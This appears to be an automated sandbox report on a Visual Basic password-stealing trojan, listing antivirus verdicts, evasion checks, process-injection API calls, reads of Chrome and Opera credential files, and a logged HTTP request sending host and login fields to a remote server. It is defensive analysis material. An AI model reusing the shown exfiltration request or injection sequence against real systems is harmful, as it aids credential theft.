11.6
0-day
62 个模型检测该样本为恶意!
重新分析
更多

752f7fba9fba7cccbdac0e60f4e63b4e0baf2071b9b22392bf512b952b721b8c

6cc253448f461b7dff7b73d1a2671f4b.exe

分析耗时

63s

最近分析

文件大小

208.0KB
静态报毒 动态报毒 100% A + TROJ AI SCORE=87 AIDETECTVM AMNUXS1BUFM CLASSIC DYOFLQ EMAILWORM GENASA GENCIRC GENERICRXAA GENETIC HIGH CONFIDENCE INJECTO ISRSTEALER KCLOUD MALICIOUS PE MALWARE1 NETPASS NIS@4PIR8D PASSWVIEW PLIMROST PSWTOOL PWSZBOT R29930 SCHMIDTI SCORE SHADESRAT STATIC AI SUSGEN TANC TSPY UNSAFE VBNA VBOBFUS VOBFUS WEBBROWSERPASSVIEW 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Baidu 20190318 1.0.0.2
Avast Win32:PUP-gen [PUP] 20201202 20.10.5736.0
Alibaba Worm:Win32/Plimrost.7cdc107d 20190527 0.3.0.5
Kingsoft Win32.Troj.Generic_a.c.(kcloud) 20201202 2017.9.26.565
McAfee GenericRXAA-AA!6CC253448F46 20201202 6.0.6.653
Tencent Malware.Win32.Gencirc.10b3cdbd 20201202 1.0.0.1
CrowdStrike 20190702 1.0
静态指标
Tries to locate where the browsers are installed (1 个事件)
file C:\Program Files (x86)\Mozilla Firefox\nss3.dll
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619621008.772876
GlobalMemoryStatusEx
success 1 0
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name DVCLAL
One or more processes crashed (1 个事件)
Time & API Arguments Status Return Repeated
1619621014.225499
__exception__
stacktrace: 
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

registers.esp: 1637144
registers.edi: 5207704
registers.eax: 1637144
registers.ebp: 1637224
registers.edx: 0
registers.ebx: 5207704
registers.esi: 5207704
registers.ecx: 2
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc000008f
exception.offset: 46887
exception.address: 0x778eb727
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
Performs some HTTP requests (1 个事件)
request GET http://myfunnyimgs4you.net63.net/index.php?action=add&username=&password=&app=&pcname=OSKAR-PC&sitename=
Allocates read-write-execute memory (usually to unpack itself) (1 个事件)
Time & API Arguments Status Return Repeated
1619621008.584876
NtProtectVirtualMemory
process_identifier: 2296
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00400000
success 0 0
Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 个事件)
Time & API Arguments Status Return Repeated
1619621013.944876
GetDiskFreeSpaceW
root_path: C:
sectors_per_cluster: 8362495
number_of_free_clusters: 8362495
total_number_of_clusters: 8362495
bytes_per_sector: 512
success 1 0
1619621013.975876
GetDiskFreeSpaceW
root_path: C:
sectors_per_cluster: 8362495
number_of_free_clusters: 8362495
total_number_of_clusters: 8362495
bytes_per_sector: 512
success 1 0
Steals private information from local Internet browsers (8 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera7\profile\wand.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera\wand.dat
Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 个事件)
Time & API Arguments Status Return Repeated
1619621007.162499
NtProtectVirtualMemory
process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
process_handle: 0xffffffff
base_address: 0x003c0000
success 0 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619621015.225499
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.8388195442204625 section {'size_of_data': '0x0002c000', 'virtual_address': '0x00009000', 'entropy': 7.8388195442204625, 'name': '.rsrc', 'virtual_size': '0x0002b770'} description A section with a high entropy has been found
entropy 0.8627450980392157 description Overall entropy of this PE file is high
网络通信
One or more of the buffers contains an embedded PE file (1 个事件)
buffer Buffer with sha1: cc3419452516bdc215a55127ac19e0b12b8e4a08
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Allocates execute permission to another process indicative of possible code injection (1 个事件)
Time & API Arguments Status Return Repeated
1619621007.366499
NtAllocateVirtualMemory
process_identifier: 2296
region_size: 339968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x000000c8
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
success 0 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619621017.928499
RegSetValueExA
key_handle: 0x00000374
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619621017.928499
RegSetValueExA
key_handle: 0x00000374
value: €´hç.<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619621017.928499
RegSetValueExA
key_handle: 0x00000374
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619621017.928499
RegSetValueExW
key_handle: 0x00000374
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619621017.928499
RegSetValueExA
key_handle: 0x00000384
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619621017.928499
RegSetValueExA
key_handle: 0x00000384
value: €´hç.<×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619621017.928499
RegSetValueExA
key_handle: 0x00000384
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619621018.069499
RegSetValueExW
key_handle: 0x00000370
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 2264 called NtSetContextThread to modify thread in remote process 2296
Time & API Arguments Status Return Repeated
1619621007.381499
NtSetContextThread
thread_handle: 0x000000c0
registers.eip: 2010382788
registers.esp: 1638384
registers.edi: 0
registers.eax: 4526816
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2296
success 0 0
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 2264 resumed a thread in remote process 2296
Time & API Arguments Status Return Repeated
1619621008.225499
NtResumeThread
thread_handle: 0x000000c0
suspend_count: 1
process_identifier: 2296
success 0 0
Generates some ICMP traffic
Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 个事件)
dead_host 108.160.169.37:443
Executed a process and injected code into it, probably while unpacking (7 个事件)
Time & API Arguments Status Return Repeated
1619621007.366499
CreateProcessInternalW
thread_identifier: 3004
thread_handle: 0x000000c0
process_identifier: 2296
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\6cc253448f461b7dff7b73d1a2671f4b.exe
track: 1
command_line: /scomma "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\gO6uSsbw1N.ini"
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\6cc253448f461b7dff7b73d1a2671f4b.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x000000c8
inherit_handles: 0
success 1 0
1619621007.366499
NtUnmapViewOfSection
process_identifier: 2296
region_size: 4096
process_handle: 0x000000c8
base_address: 0x00400000
success 0 0
1619621007.366499
NtAllocateVirtualMemory
process_identifier: 2296
region_size: 339968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x000000c8
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00400000
success 0 0
1619621007.381499
NtGetContextThread
thread_handle: 0x000000c0
success 0 0
1619621007.381499
NtSetContextThread
thread_handle: 0x000000c0
registers.eip: 2010382788
registers.esp: 1638384
registers.edi: 0
registers.eax: 4526816
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2296
success 0 0
1619621008.225499
NtResumeThread
thread_handle: 0x000000c0
suspend_count: 1
process_identifier: 2296
success 0 0
1619621008.803876
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2296
success 0 0
File has been identified by 62 AntiVirus engines on VirusTotal as malicious (50 out of 62 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Dropper.6
FireEye Generic.mg.6cc253448f461b7d
CAT-QuickHeal VirTool.VBInject.OL3
ALYac Spyware.ISRStealer
Cylance Unsafe
VIPRE Trojan.Win32.Vobfus.a (v)
AegisLab Worm.Win32.VBNA.o!c
K7AntiVirus EmailWorm ( 003c363a1 )
BitDefender Gen:Variant.Dropper.6
K7GW EmailWorm ( 003c363a1 )
Cybereason malicious.48f461
Arcabit Trojan.Dropper.6
BitDefenderTheta AI:Packer.C1FA66CC1F
Cyren W32/PasswView.TANC-0160
Symantec W32.Shadesrat
ESET-NOD32 Win32/PSW.VB.NIS
APEX Malicious
Avast Win32:PUP-gen [PUP]
ClamAV Win.Worm.Vobfus-7056752-0
Kaspersky Worm.Win32.VBNA.b
Alibaba Worm:Win32/Plimrost.7cdc107d
NANO-Antivirus Trojan.Win32.VB.dyoflq
ViRobot Trojan.Win32.Agent.266240.AE
Rising Stealer.ISRStealer!1.C55E (CLASSIC)
Ad-Aware Gen:Variant.Dropper.6
Sophos ML/PE-A + Troj/VB-HHX
Comodo TrojWare.Win32.PSW.VB.NIS@4pir8d
F-Secure Trojan:W32/VBinject.Y
DrWeb Trojan.PWS.Stealer.23689
Zillya Worm.VBNA.Win32.304032
TrendMicro TSPY_INJECTO.JB
McAfee-GW-Edition BehavesLike.Win32.PWSZbot.dc
Emsisoft Gen:Variant.Dropper.6 (B)
SentinelOne Static AI - Malicious PE
Webroot W32.Trojan.Gen
Avira TR/Spy.175928
Antiy-AVL Trojan[PSWTool]/Win32.NetPass
Kingsoft Win32.Troj.Generic_a.c.(kcloud)
Gridinsoft Trojan.Win32.Agent.oa
Microsoft TrojanSpy:Win32/Plimrost.B
SUPERAntiSpyware Trojan.Agent/Gen-Stealer
AhnLab-V3 Worm/Win32.VBNA.R29930
ZoneAlarm Worm.Win32.VBNA.b
GData Win32.Trojan.VB.OU
Cynet Malicious (score: 100)
Acronis suspicious
McAfee GenericRXAA-AA!6CC253448F46
MAX malware (ai score=87)
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2012-03-08 00:44:29

Imports

Library MSVBVM60.DLL:
0x401000 MethCallEngine
0x401004
0x401008
0x40100c
0x401010
0x401014
0x401018
0x40101c
0x401020
0x401024
0x401028
0x40102c
0x401030 EVENT_SINK_AddRef
0x401034
0x401038 DllFunctionCall
0x40103c EVENT_SINK_Release
0x401040
0x401048 __vbaExceptHandler
0x40104c
0x401050
0x401054
0x401058
0x40105c
0x401060
0x401064 ProcCallEngine
0x401068
0x40106c
0x401070
0x401074
0x401078
0x40107c
0x401080
0x401084
0x401088
0x40108c
0x401090

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49180 153.92.0.100 myfunnyimgs4you.net63.net 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 61680 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 60384 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900

HTTP & HTTPS Requests

URI Data
http://myfunnyimgs4you.net63.net/index.php?action=add&username=&password=&app=&pcname=OSKAR-PC&sitename= 
GET /index.php?action=add&username=&password=&app=&pcname=OSKAR-PC&sitename= HTTP/1.1
User-Agent: HardCore Software For : Public
Host: myfunnyimgs4you.net63.net

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.